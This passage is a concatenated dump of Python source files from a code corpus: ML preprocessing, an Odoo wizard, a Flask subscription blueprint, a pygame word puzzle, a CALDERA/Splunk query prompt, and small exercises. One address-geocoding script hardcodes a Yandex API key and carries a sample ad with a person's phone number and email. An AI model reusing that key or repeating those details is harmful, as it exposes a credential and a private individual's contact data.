size\")\nflags.DEFINE_integer(\"steps_per_epoch\", 1000, \"Steps per epoch\")\nflags.DEFINE_integer(\"validation_steps\", 20, \"Batch size\")\n\nflags.DEFINE_string(\"job-dir\", None, \"Job dir\")\n\n# Required flags\nflags.mark_flag_as_required(\"train_files\")\nflags.mark_flag_as_required(\"eval_files\")\n\n\ndef main(argv):\n del argv #Unused\n \n train_evaluate()\n \n\nif __name__ == '__main__':\n \n app.run(main)\n","sub_path":"training-singlenode/train/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"603030404","text":"from yargy import (\n Parser, or_\n)\n\nfrom yargy import interpretation\nfrom yargy.interpretation import fact, attribute\n\nimport sys\nsys.path.append('/home/bun/natasha')\n\nfrom natasha_expanded.grammars import address\n\nimport requests\nfrom functools import lru_cache\n\nYNDX_GEO_KEY = '29d541ba-6887-4e71-be53-b00d7e178147'\n\n@lru_cache(maxsize=2**11)\ndef get_coordinates(geocode):\n r = requests.get(f'https://geocode-maps.yandex.ru/1.x/?apikey={YNDX_GEO_KEY}&geocode={geocode}&format=json&results=1')\n featureMember = r.json()['response']['GeoObjectCollection']['featureMember']\n if featureMember:\n r = featureMember[0]['GeoObject']['Point']['pos']\n long, lat = [float(i) for i in r.split(' ')]\n return long, lat\n else:\n return None, None\n\nAddress = fact(\n 'Address',\n [attribute('parts').repeatable()]\n)\n\nFIND_ADDRESS = or_(\n address.METRO.interpretation(\n Address.parts\n ),\n address.STREET_LEVEL_CUSTOM.interpretation(\n Address.parts\n ),\n address.GOROD_LEVEL.interpretation(\n Address.parts\n ),\n address.RAION.interpretation(\n Address.parts\n ),\n address.OTHER_OBJECTS.interpretation(\n Address.parts\n )\n).interpretation(Address)\n \ndef find_address(text):\n pars = Parser(FIND_ADDRESS)\n matc = pars.findall(text)\n facts = [_.span for _ in matc]\n return get_coordinates(' '.join([text[f[0]:f[1]] for f in facts]))\n \ntext = \"\"\"5.12.17 №32214 кобель, Взрослый Черный с белым,хвост пушистый,\nне купированный, больше темного окраса,или просто грязный. \nв районе Можайское шоссе, бегает собака(мальчик),грязный,похож \nна русского спаниеля. Заметили его дней 5-6 тому назад,близко не подходит,\nкажется с коричневым ошейником,упитанный.может кто ищет \nНайден(а) в районе Москва ул.Толбухина, ул Говорово 89163894451 \nИрина mussirina@mail.ru\"\"\"\n\nprint(find_address(text))","sub_path":"petsi/find_address_res.py","file_name":"find_address_res.py","file_ext":"py","file_size_in_byte":2196,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"545192963","text":"from __future__ import division\nfrom __future__ import print_function\n\nimport re\nimport numpy as np\nimport six\nfrom tensorflow.contrib import learn\nfrom tensorflow.python.platform import gfile\nfrom tensorflow.contrib import learn # pylint: disable=g-bad-import-order\n\nTOKENIZER_RE = re.compile(r\"[A-Z]{2,}(?![a-z])|[A-Z][a-z]+(?=[A-Z])|[\\'\\w\\-]+\",\n re.UNICODE)\n\nclass MyVocabularyProcessor(learn.preprocessing.VocabularyProcessor):\n def __init__(self,\n max_seq_len,\n max_word_len,\n min_frequency=0,\n vocabulary=None,\n alphabet_id=None\n ):\n self.max_word_len = max_word_len\n self.alphabet_id = alphabet_id\n sup = super(MyVocabularyProcessor,self)\n sup.__init__(max_seq_len,min_frequency, vocabulary)\n self.max_seq_len = max_seq_len\n self.max_word_len = max_word_len\n self.alphabet_id = alphabet_id\n\n def padSequence(self, raw_document, mode):\n \"\"\"Transform documents to word-id matrix.\n Convert words to ids with vocabulary fitted with fit or the one\n provided in the constructor.\n Args:\n raw_documents: An iterable which yield either str or unicode.\n Yields:\n x: iterable, [n_samples, max_document_length]. Word-id matrix.\n \"\"\"\n length = self.max_seq_len\n for tokens in self._tokenizer(raw_document):\n word_ids = np.zeros(length, np.int64)\n for idx, token in enumerate(tokens):\n if idx >= length:\n break\n word_ids[idx] = self.vocabulary_.get(token)\n yield tokens, word_ids\n\n def padChar(self, raw_document):\n for tokens in self._tokenizer(raw_document):\n char_ids = []\n for i in range(self.max_seq_len):\n char_ids.append(np.zeros(self.max_word_len, np.int64))\n seq_len = len(tokens)\n for i in range(min(seq_len, self.max_seq_len)):\n word_len = len(tokens[i])\n for j in range(min(word_len, self.max_word_len)):\n if tokens[i][j] not in self.alphabet_id.keys():\n char_ids[i][j] = 0\n else:\n char_ids[i][j] = self.alphabet_id[tokens[i][j]]\n yield char_ids\n","sub_path":"program/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":2366,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"600251245","text":"from odoo import models, fields, api\nfrom odoo.exceptions import ValidationError\n\nclass UpdateCurrencyRate(models.TransientModel):\n _name = \"res.currency.update.wiz\"\n\n date_time = fields.Datetime(\"Date\", default=fields.Datetime.now, required=1)\n currency_id = fields.Many2one(\"res.currency\", \"Currency\", required=1)\n rate_symbol = fields.Char(related=\"currency_id.symbol\", string=\"Symbol\")\n currency_unit_label = fields.Char(related=\"currency_id.currency_unit_label\", string=\"Currency Unit\")\n last_rate = fields.Float(\"Last Rate\", digits=(12, 6), compute=\"_get_last_currency_rate\")\n new_rate = fields.Float(\"New Rate\", digits=(12, 6), required=1)\n\n @api.constrains('new_rate')\n def check_new_rate(self):\n for rec in self:\n if rec.new_rate <= 0.00:\n raise ValidationError(\"New rate must be greater than zero.\")\n if rec.new_rate == rec.last_rate:\n raise ValidationError(\"Please set new rate!.\")\n\n\n @api.depends('currency_id')\n def _get_last_currency_rate(self):\n if self.currency_id:\n rate_ids = self.currency_id.rate_ids\n if rate_ids:\n self.last_rate = (1 / rate_ids[0].rate)\n\n @api.multi\n def apply_new_currency_rate(self):\n if self.currency_id:\n self.env['res.currency.rate'].create({'name': self.date_time,\n 'currency_id': self.currency_id.id,\n 'rate': 1 / self.new_rate,\n 'company_id': self.env.user.company_id.id,\n })","sub_path":"update_currency_rate/wizard/update_currency_rate.py","file_name":"update_currency_rate.py","file_ext":"py","file_size_in_byte":1677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"405596360","text":"from math import pi\ndef cm(r):\n cm=(r*2)*pi\n return round(cm,2)\ndef cm2(r):\n cm2=r**2*pi\n return round(cm2,2)\nr=float(input('半径を入力して下さい:'))\ncm=cm(r)\ncm2=cm2(r)\nprint('半径',r,\"の円の円周は\",cm,sep='')\nprint('半径',r,'の面積は',cm2,sep='')","sub_path":"9-9.py","file_name":"9-9.py","file_ext":"py","file_size_in_byte":286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"325294310","text":"import re\n\nfrom django.core.exceptions import ValidationError\nfrom django.core.validators import RegexValidator, URLValidator\nfrom pyld import jsonld\n\n\nclass DataURIValidator(RegexValidator):\n regex = re.compile(\n r'^data:' # required scheme\n r'(\\w+\\/\\w+)?' # optional media type\n r'(;charset=[\\w-]+)?' # optional charset\n r'(;base64)?' # optional base64\n r',(.+)' # data\n )\n\n def __call__(self, *args, **kwargs):\n super(DataURIValidator, self).__call__(*args, **kwargs)\n\n\nclass URLOrDataURIValidator(object):\n\n def __init__(self, *args, **kwargs):\n self.data_uri_validator = DataURIValidator(*args, **kwargs)\n self.url_validator = URLValidator(*args, **kwargs)\n\n def __call__(self, value):\n try:\n self.data_uri_validator(value)\n except ValidationError as e:\n self.url_validator(value)\n\n\nclass LDTypeValidator(object):\n message = 'Type does not match.'\n\n def __init__(self, type_name=None, message=None):\n self.type_name = type_name\n if message is not None:\n self.message = message\n\n def __call__(self, value):\n if isinstance(value, basestring):\n if self.type_name != value:\n raise ValidationError(message=self.message)\n else:\n if self.type_name not in value:\n raise ValidationError(message=self.message)\n\n\nclass JsonLdValidator(object):\n message = 'Invalid JSON LD document: {}'\n\n def __init__(self, **kwargs):\n super(JsonLdValidator, self).__init__()\n self.document_loader = kwargs.get('document_loader')\n\n def __call__(self, value, **kwargs):\n options = {}\n\n if self.document_loader:\n options['documentLoader'] = self.document_loader\n\n context = value.get('@context', None)\n if context is None:\n raise ValidationError(message=self.message.format('@context is missing'))\n try:\n expanded = jsonld.expand(value, options)\n except Exception as e:\n raise ValidationError(message=self.message.format('error during expansion: {}'.format(e.message)))\n\n try:\n compacted = jsonld.compact(expanded, context, options)\n except Exception as e:\n raise ValidationError(message=self.message.format('error during compaction: {}'.format(e.message)))\n","sub_path":"badgecheck/validators.py","file_name":"validators.py","file_ext":"py","file_size_in_byte":2430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"509110811","text":"from .placeholder import Placeholder\n\n\nclass option(Placeholder):\n\n # Public\n\n def __init__(self, placeholders, options, name, *, prefix=['-', '--']):\n self.__placeholders = placeholders\n self.__options = options\n self.__name = name\n self.__prefix = prefix\n\n def __call__(self):\n argv = []\n value = self.__options.pop(self.__name)\n if value is not False:\n argv += self.__translate_name(self.__name, prefix=self.__prefix)\n if value is not True:\n argv += self.__translate_value(value)\n return argv\n\n # Private\n\n def __translate_name(self, name, *, prefix):\n argv = []\n name = name.replace('_', '-')\n try:\n name = prefix + name\n except TypeError:\n if len(name) == 1:\n name = prefix[0] + name\n else:\n name = prefix[1] + name\n argv.append(name)\n return argv\n\n def __translate_value(self, value):\n argv = []\n if not isinstance(value, list):\n value = [value]\n for item in value:\n item = str(item)\n argv.append(item)\n return argv\n","sub_path":"run_command/placeholder/option.py","file_name":"option.py","file_ext":"py","file_size_in_byte":1199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"488653640","text":"#From codereview.stackexchange.com \ndef partitions(set_):\n if not set_:\n yield []\n return\n for i in range(2**len(set_)//2):\n parts = [set(), set()]\n for item in set_:\n parts[i&1].add(item)\n i >>= 1\n for b in partitions(parts[1]):\n yield [parts[0]]+b\n\n\n# This is a helper function that will fetch all of the available \n# partitions for you to use for your brute force algorithm.\ndef get_partitions(set_):\n for partition in partitions(set_):\n yield [list(elt) for elt in partition]\n\n### Uncomment the following code and run this file\n### to see what get_partitions does if you want to visualize it:\n\n#==============================================================================\n# for item in (get_partitions(['a','a','b'])):\n# print(item)\n#==============================================================================\n \ndef brute_force_cow_transport(cows, limit):\n listPart = []\n for partition in get_partitions(cows.keys()):\n for part in partition:\n partTotal = 0\n for word in part:\n partTotal += cows[word]\n if partTotal > limit:\n break\n else:\n listPart.append(partition)\n min = len(cows), 0\n for i in listPart:\n if len(i) <= min[0]:\n min = len(i), i\n return min[1]\n \nprint(brute_force_cow_transport({\"Jesse\": 6, \"Maybel\": 3, \"Callie\": 2, \"Maggie\": 5}, 9))\nprint(brute_force_cow_transport({'Miss Bella': 25, 'Horns': 25, 'Milkshake': 40, 'MooMoo': 50, 'Lotus': 40, 'Boo': 20}, 100))","sub_path":"study/EdX MIT 6.00.2x/pset1/ps1_partition.py","file_name":"ps1_partition.py","file_ext":"py","file_size_in_byte":1622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"469766382","text":"# pyright: reportMissingImports=false\nimport tkinter as tk\nimport configs.constants as constants\n\n# Field class\nclass Number(tk.Label):\n def __init__(self, parent, *args, **kwargs):\n tk.Label.__init__(\n self,\n parent,\n fg=constants.SCREEN_LABEL,\n bg=constants.SCREEN_BG,\n font=constants.BASKET_FONT,\n *args,\n **kwargs\n )\n\nclass Display(tk.Frame):\n def __init__(self, parent, c):\n tk.Frame.__init__(self, parent, bg=\"#373C40\", padx=8, pady=8)\n # Screen shadow\n tk.Frame(self, bg=\"#8A9986\", height=5).pack(fill=\"x\")\n\n # Basket screen numbers\n self.basketFrame = tk.Frame(self, bg=\"#A6B8A2\")\n self.basketFrame.pack(fill=\"x\")\n Number(self.basketFrame, text=\"Cart:\").pack(side=\"left\", anchor=\"w\", padx=(4, 0))\n Number(self.basketFrame, textvariable=c.cart).pack(side=\"left\", anchor=\"e\")\n\n Number(self.basketFrame, textvariable=c.subtotal).pack(side=\"right\", anchor=\"e\", padx=(0, 4))\n Number(self.basketFrame, text=\"Subtotal: $\").pack(side=\"right\", anchor=\"w\")\n\n # Main screen numbers\n self.indicator = tk.Label(\n self,\n fg=constants.SCREEN_LABEL,\n bg=constants.SCREEN_BG,\n font=constants.SCREEN_FONT,\n textvariable=c.screenMessage,\n justify=\"center\",\n height=4, width=14,\n border=4\n )\n self.indicator.pack(fill=\"x\")\n","sub_path":"components/display.py","file_name":"display.py","file_ext":"py","file_size_in_byte":1336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"356224988","text":"import copy\nimport logging\n\nimport numpy as np\nfrom autoarray.dataset import imaging as im\nfrom autocti.structures import arrays\n\nlogger = logging.getLogger(__name__)\n\n\nclass Imaging(im.AbstractImaging):\n def __init__(self, image, noise_map, name=None):\n \"\"\"A collection of 2D imaging dataset(an image, noise-map, psf, etc.)\n\n Parameters\n ----------\n image : aa.Array\n The array of the image data, in units of electrons per second.\n noise_map : NoiseMap | float | ndarray\n An array describing the RMS standard deviation error in each pixel, preferably in units of electrons per\n second.\n background_noise_map : NoiseMap\n An array describing the RMS standard deviation error in each pixel due to the background sky noise_map,\n preferably in units of electrons per second.\n poisson_noise_map : NoiseMap\n An array describing the RMS standard deviation error in each pixel due to the Poisson counts of the source,\n preferably in units of electrons per second.\n exposure_time_map : aa.Array\n An array describing the effective exposure time in each imaging pixel.\n background_sky_map : aa.Scaled\n An array describing the background sky.\n \"\"\"\n\n super(Imaging, self).__init__(image=image, noise_map=noise_map, name=name)\n\n @classmethod\n def from_fits(\n cls,\n image_path,\n pixel_scales,\n image_hdu=0,\n noise_map_path=None,\n noise_map_hdu=0,\n name=None,\n ):\n \"\"\"Factory for loading the imaging data_type from .fits files, as well as computing properties like the noise-map,\n exposure-time map, etc. from the imaging-data.\n\n This factory also includes a number of routines for converting the imaging-data from unit_label not supported by PyAutoLens \\\n (e.g. adus, electrons) to electrons per second.\n\n Parameters\n ----------\n name\n image_path : str\n The path to the image .fits file containing the image (e.g. '/path/to/image.fits')\n pixel_scales : float\n The size of each pixel in arc seconds.\n image_hdu : int\n The hdu the image is contained in the .fits file specified by *image_path*.\n noise_map_path : str\n The path to the noise_map .fits file containing the noise_map (e.g. '/path/to/noise_map.fits')\n noise_map_hdu : int\n The hdu the noise_map is contained in the .fits file specified by *noise_map_path*.\n \"\"\"\n\n image = arrays.Array.from_fits(\n file_path=image_path, hdu=image_hdu, pixel_scales=pixel_scales\n )\n\n noise_map = arrays.Array.from_fits(\n file_path=noise_map_path, hdu=noise_map_hdu, pixel_scales=pixel_scales\n )\n\n return Imaging(image=image, noise_map=noise_map, name=name)\n\n def output_to_fits(self, image_path, noise_map_path=None, overwrite=False):\n\n self.image.output_to_fits(file_path=image_path, overwrite=overwrite)\n\n if self.noise_map is not None and noise_map_path is not None:\n self.noise_map.output_to_fits(file_path=noise_map_path, overwrite=overwrite)\n\n\nclass MaskedImaging(im.MaskedImaging):\n def __init__(self, imaging, mask):\n \"\"\"\n The lens dataset is the collection of data_type (image, noise-map, PSF), a mask, grid, convolver \\\n and other utilities that are used for modeling and fitting an image of a strong lens.\n\n Whilst the image, noise-map, etc. are loaded in 2D, the lens dataset creates reduced 1D arrays of each \\\n for lens calculations.\n\n Parameters\n ----------\n imaging: im.Imaging\n The imaging data_type all in 2D (the image, noise-map, PSF, etc.)\n mask: msk.Mask2D\n The 2D mask that is applied to the image.\n \"\"\"\n\n super().__init__(imaging=imaging, mask=mask)\n\n self.image = imaging.image * np.invert(mask)\n self.noise_map = imaging.noise_map * np.invert(mask)\n","sub_path":"autocti/dataset/imaging.py","file_name":"imaging.py","file_ext":"py","file_size_in_byte":4085,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"571557917","text":"import collections \nimport csv\n\n\nif __name__ == \"__main__\":\n with open(\"names.csv\") as file:\n shared_firstnames = collections.defaultdict(list)\n shared_lastnames = collections.defaultdict(list)\n reader = csv.DictReader(file)\n for line in reader:\n shared_firstnames[line[\"First\"]].append(line[\"Last\"])\n shared_lastnames[line[\"Last\"]].append(line[\"First\"])\n\n print(\"** Shared First Names! **\")\n for key, value in shared_firstnames.items():\n print(f\"{key} ({len(value)}): {value}\")\n\n\n print(\"** Shared Last Names! **\")\n for key, value in shared_lastnames.items():\n print(f\"{key} ({len(value)}): {value}\")\n","sub_path":"Parseltongue_04/00_phonebook.py","file_name":"00_phonebook.py","file_ext":"py","file_size_in_byte":705,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"613946340","text":"import math\r\nimport random\r\n\r\ndef sek_paa_banen(a,b,c):\r\n t = c*60\r\n t_s = t/a\r\n bt = t - (t_s*b)\r\n if bt - int(bt) < 0.5:\r\n sek = math.floor(bt)\r\n else:\r\n sek = math.ceil(bt)\r\n return sek\r\n\r\n\r\ndef minutt_sekunder(sekunder):\r\n m = sekunder // 60\r\n s = sekunder % 60\r\n if s < 10:\r\n s = '0' + str(s)\r\n else:\r\n s = str(s)\r\n return str(m)+':'+s\r\n\r\ndef les_inn_frafall():\r\n spillere = []\r\n avslutt = False\r\n while not avslutt:\r\n x = str(input('Spiller som har meldt frafall: '))\r\n if x == '':\r\n avslutt = True\r\n else:\r\n spillere.append(x)\r\n return spillere\r\n\r\ndef finn_tilgjengelige(alle,forfall):\r\n tilgj = [] + alle\r\n for navn in forfall:\r\n tilgj.remove(navn)\r\n return tilgj\r\n\r\n\r\ndef laginndeling(spillere,sp_pr_lag):\r\n ant_lag = len(spillere)//sp_pr_lag\r\n kopi =[]+spillere\r\n lagoppsett = [[] for i in range(ant_lag)]\r\n lag = 0\r\n while kopi != []:\r\n navn = random.choice(kopi)\r\n kopi.remove(navn)\r\n lagoppsett[lag].append(navn)\r\n lag = (lag+1)%ant_lag\r\n return lagoppsett\r\n\r\n\r\ndef main():\r\n print('Skriv navn, eller kun Enter(tom tekst) for å avslutte')\r\n\r\n\r\nsp = ['Ada', 'Bo', 'Eli', 'Isa', 'Cindy', 'Henrik', 'Ine', 'Jo', 'Kim',\r\n'Lucas', 'My', 'Noor', 'Ola', 'Pia']\r\n\r\n\r\n","sub_path":"ITGK_eksamensforberedelse/kont2016/oppg3.py","file_name":"oppg3.py","file_ext":"py","file_size_in_byte":1354,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"473797583","text":"import json\nimport os\nimport caldera.db\nfrom splunk.cmd import splunk_red_search_op, splunk_red_search_ability\n\nfrom caldera.db import get_ops, core_db, get_ability_info, get_unique_id\n\ndef op_info():\n com_ops = \"\"\n while(com_ops != \"x\"):\n ops = get_ops()\n print(ops)\n com_ops = input(\"(ops)->\")\n if(com_ops in ops):\n op_num = ops[com_ops]\n core_db.execute('SELECT * FROM core_chain WHERE op_id=?', (op_num,))\n ret = core_db.fetchall()\n\n print(\"id ability att&ck_id name start end\")\n for x in range(0, len(ret)):\n print(str(ret[x][0]).ljust(2), end=\" \")\n info1,info2,info3 = get_ability_info(ret[x][3])\n print(str(ret[x][3]).ljust(3), end=\" \")\n print(info2.ljust(6), end=\" \")\n print(info3.ljust(20), end=\" \")\n print(ret[x][10], end=\" \")\n print(ret[x][11])\n com_abil = input(\"(ops/\" + com_ops + \")->\")\n for y in range(0, len(ret)):\n if(int(com_abil) == ret[y][3]):\n splunk_red_search_ability(int(com_abil))\n break\n\ndef prompt():\n com = \"\"\n while(com != 'x'):\n os.system('cls')\n print(\"splunk analytics for caldera\")\n print(\"caldera path: [\" + caldera.db.caldera_path + \"]\")\n com = input(\"->\")\n if(com=='ops'):\n op_info()\n\n\n\n","sub_path":"utils/prompt.py","file_name":"prompt.py","file_ext":"py","file_size_in_byte":1536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"312817447","text":"import pandas as pd\r\nimport numpy as np\r\nimport glob\r\n\r\nall_data = pd.DataFrame()\r\nfor f in glob.glob(\"C:\\\\Users\\\\amarsh04\\\\Desktop\\\\Industry Updates\\\\Paid Search\\\\Google\\\\CVRs\\\\*.xlsx\"):\r\n df = pd.read_excel(f)\r\n df.rename(columns={ df.columns[0]: \"advertising_channel_type\", df.columns[1]: \"advertising_channel_sub_type\", df.columns[2]: \"account_id\", df.columns[3]: \"account_name\", df.columns[4]: \"campaign_name\", df.columns[5]: \"device_type\", df.columns[6]: \"year\", df.columns[7]: \"month\", df.columns[8]: \"conversions\"}, inplace=True)\r\n all_data = all_data.append(df,ignore_index=True)\r\n\r\nall_data.drop_duplicates()\r\n \r\nall_data.insert(0, \"media_provider_name\", \"google\")\r\n#all_data.rename(columns={\"account_name\": \"account_name\"})\r\n#all_data.rename(columns={\"device\": \"device_type\"})\r\n\r\nall_data.to_csv('C:\\\\Users\\\\amarsh04\\\\Desktop\\\\Industry Updates\\\\full_googleads_cvrs.csv', sep=',', index=False)","sub_path":"concat_googleads_cvrs.py","file_name":"concat_googleads_cvrs.py","file_ext":"py","file_size_in_byte":915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"234751004","text":"import pygame\r\n\r\n\r\nclass animation():\r\n\r\n def setStartPoint(self):\r\n\r\n current_point = [None, None]\r\n \r\n if self.direction == 'top':\r\n current_point[0] = self.destination[0]\r\n current_point[1] = 0\r\n\r\n if self.direction == 'bottom':\r\n current_point[0] = self.destination[0]\r\n current_point[1] = 0\r\n \r\n if self.direction == 'left':\r\n current_point[0] = self.destination[0]\r\n current_point[1] = 0\r\n \r\n if self.direction == 'right':\r\n current_point[0] = self.destination[0]\r\n current_point[1] = 0\r\n \r\n return current_point\r\n\r\n\r\n def __init__(self, surface, destination, direction = None, speed = None):\r\n \r\n self.surface = surface\r\n self.destination = destination\r\n \r\n self.speed = speed\r\n \r\n if direction == None:\r\n self.current_point = []\r\n self.done = True\r\n else:\r\n self.direction = direction\r\n self.current_point = self.setStartPoint()\r\n self.done = False\r\n \r\n \r\n def getNextPoint(self):\r\n \r\n if self.direction == 'top':\r\n self.current_point[0] = self.destination[0] \r\n self.current_point[1] = self.current_point[1] + self.speed\r\n if self.current_point[1] >= self.destination[1]:\r\n self.current_point[1] = self.destination[1]\r\n\r\n if self.direction == 'bottom':\r\n self.current_point[0] = self.destination[0]\r\n self.current_point[1] = 0\r\n \r\n if self.direction == 'left':\r\n self.current_point[0] = self.destination[0]\r\n self.current_point[1] = 0\r\n \r\n if self.direction == 'right':\r\n self.current_point[0] = self.destination[0]\r\n self.current_point[1] = 0\r\n \r\n return self.current_point\r\n\r\n def getSize(self):\r\n\r\n return self.surface.get_size()\r\n \r\n\r\n\r\nclass Button():\r\n\r\n def setText(self, text):\r\n\r\n self.text = text\r\n self.txt_surf = game_font.render(self.text, True, black)\r\n\r\n txt_width, txt_height = self.txt_surf.get_size()\r\n mid_point_x = self.button_location[0] + (self.button_size[0]/2)\r\n mid_point_y = self.button_location[1] + (self.button_size[1]/2)\r\n\r\n self.txt_loc = (mid_point_x - (txt_width/2), mid_point_y - (txt_height/2))\r\n\r\n\r\n def __init__(self, colour, button_location, button_size = None): \r\n\r\n self.button_location = button_location\r\n self.colour = colour\r\n\r\n if button_size != None :\r\n self.button_size = button_size\r\n else:\r\n self.button_size = [50, 27]\r\n\r\n self.light_colour = (colour[0] - 25, colour[1] - 25, colour[2] - 25)\r\n \r\n\r\n def draw(self):\r\n\r\n self.rect = pygame.draw.rect(gameDisplay, self.colour, (self.button_location[0], self.button_location[1], self.button_size[0], self.button_size[1]), 2)\r\n \r\n\r\n def hover(self):\r\n\r\n pygame.draw.rect(gameDisplay, self.light_colour, (self.button_location[0], self.button_location[1], self.button_size[0], self.button_size[1]), 2)\r\n\r\n\r\n\r\ndef play_music(file_name):\r\n\r\n music = pygame.mixer.music\r\n\r\n music.load(file_name)\r\n music.play(-1)\r\n music.set_volume(0.25)\r\n\r\n\r\ndef animate(animation_obj):\r\n\r\n if not animation_obj.done:\r\n gameDisplay.blit(animation_obj.surface, animation_obj.current_point)\r\n current_point = animation_obj.getNextPoint()\r\n if animation_obj.destination <= current_point:\r\n animation_obj.done = True\r\n else:\r\n gameDisplay.blit(animation_obj.surface, animation_obj.destination)\r\n \r\n return animation_obj.done\r\n\r\n\r\ndef take_input():\r\n pass\r\n \r\n\r\n\r\ndef game_intro():\r\n\r\n## play_music('music/intro_music.mp3')\r\n\r\n welcome_surf = pygame.image.load('images/welcome.png')\r\n welcome_obj = animation(welcome_surf, [130, 75], 'top', 5)\r\n\r\n start_button = Button(grey, (335, 450), (100, 50))\r\n start_button.setText('Start')\r\n\r\n intro = True\r\n\r\n while intro:\r\n\t\r\n gameDisplay.fill(white)\r\n\r\n if animate(welcome_obj):\r\n\r\n start_button.draw()\r\n gameDisplay.blit(start_button.txt_surf, start_button.txt_loc)\r\n\r\n for event in pygame.event.get():\r\n print(event)\r\n\r\n if event.type == pygame.QUIT:\r\n pygame.quit()\r\n exit()\r\n\r\n mouse_position = pygame.mouse.get_pos()\r\n if event.type == pygame.MOUSEMOTION:\r\n if start_button.rect.collidepoint(mouse_position):\r\n start_button.hover()\r\n \r\n if event.type == pygame.MOUSEBUTTONUP:\r\n if start_button.rect.collidepoint(mouse_position):\r\n intro = False\r\n \r\n pygame.display.update()\r\n clock.tick(30)\r\n\t\t\r\n return True\r\n\r\n\r\ndef start_game():\r\n\r\n pygame.mixer.fadeout(2000)\r\n\r\n## play_music('music/game_music.mp3')\r\n\r\n ok_text_surf = game_font.render('OK!', True, black)\r\n ok_text = animation(ok_text_surf, [375, 50], 'top', 3)\r\n\t\r\n set_text_surf = game_font.render('Set the length of the word ', True, black)\r\n set_text = animation(set_text_surf, [225,130])\r\n\r\n button_location = set_text.getSize()\r\n input_button = Button(grey, (set_text.destination[0] + button_location[0], set_text.destination[1]))\r\n\r\n started = False\r\n\r\n while not started:\r\n\r\n gameDisplay.fill(white)\r\n\r\n if animate(ok_text):\r\n animate(set_text)\r\n input_button.draw()\r\n\r\n for event in pygame.event.get():\r\n print(event)\r\n\r\n if event.type == pygame.QUIT:\r\n pygame.quit()\r\n exit()\r\n\r\n mouse_position = pygame.mouse.get_pos()\r\n if event.type == pygame.MOUSEMOTION:\r\n if input_button.rect.collidepoint(mouse_position):\r\n input_button.hover() \r\n \r\n if event.type == pygame.MOUSEBUTTONUP:\r\n if input_button.rect.collidepoint(mouse_position):\r\n take_input()\r\n started = True\r\n \r\n\t\t\t\r\n pygame.display.update()\r\n clock.tick(30)\r\n\t\r\n return True\r\n\r\n\r\npygame.init()\r\n\r\ndisplay_width = 800\r\ndisplay_height = 600\r\n\r\ngameDisplay = pygame.display.set_mode((display_width, display_height))\r\npygame.display.set_caption('WordPuzzle')\r\n\r\nblack = (75,75,75)\r\nwhite = (255,255,255)\r\ngrey = (150,150,200)\r\nlight_grey = (75,75,100)\r\n\r\ngame_font = pygame.font.Font(None, 35)\r\nclock = pygame.time.Clock()\r\n\r\ngame_intro()\r\nstart_game()\r\n#play()\r\n","sub_path":"Final_1.py","file_name":"Final_1.py","file_ext":"py","file_size_in_byte":6975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"260232025","text":"import csv\nimport matplotlib.pyplot as plt\nimport numpy as np\n\npath = \"./graph1_accuracy.csv\"\n\nx_axis = []\ny_axis = []\n\nwith open(path, \"rb\") as file:\n reader = csv.reader(file)\n for row in reader:\n x_axis.append(row[1])\n y_axis.append(row[2])\n\nplt.plot(x_axis, y_axis)\nplt.locator_params(numticks=4)\nplt.show()\n","sub_path":"Helper Scripts/CNN Graph Scripts/graph1.py","file_name":"graph1.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"273372097","text":"from flask import Blueprint, redirect, request, url_for, render_template\nfrom ..representations.subscription import CreateSubscriptionRequest\nfrom .helper import verify_auth\n\n\ndef construct_subscription_blueprint(user_client):\n subscription_crud = Blueprint('subscription', __name__)\n\n @subscription_crud.route('/create', methods=['POST'])\n def create():\n # check user login\n (claims, error_message) = verify_auth(request.cookies.get('funtech_token'))\n if claims is None or error_message is not None:\n return redirect(url_for('auth.login'))\n\n if request.method == 'POST':\n data = request.form.to_dict(flat=True)\n user_id = data['user_id']\n park_id = data['park_id']\n create_subscription_request = CreateSubscriptionRequest(user_id=user_id, park_id=park_id)\n user_client.create_subscription(create_subscription_request)\n return redirect(url_for('park.view_posts', id=str(park_id)))\n\n @subscription_crud.route('/delete', methods=['POST'])\n def delete():\n # check user login\n (claims, error_message) = verify_auth(request.cookies.get('funtech_token'))\n if claims is None or error_message is not None:\n return redirect(url_for('auth.login'))\n user = user_client.get_by_email_id(claims['email'])\n\n if request.method == 'POST':\n data = request.form.to_dict(flat=True)\n subscription_id = data['subscription_id']\n # check if the subscription belongs to user. Can be done on backend also\n error = user_client.delete_subscription(subscription_id)\n if error is None:\n return redirect(url_for('user.view_subscriptions', id=str(user.id)))\n else:\n return render_template('error.html', user=user)\n\n return subscription_crud\n","sub_path":"ui/app/amusepark/routes/subscription_route.py","file_name":"subscription_route.py","file_ext":"py","file_size_in_byte":1874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"213886498","text":"\"\"\"Contains functions for managing a database for workflow and task information.\"\"\"\n\nimport sqlite3\nfrom sqlite3 import Error\nfrom 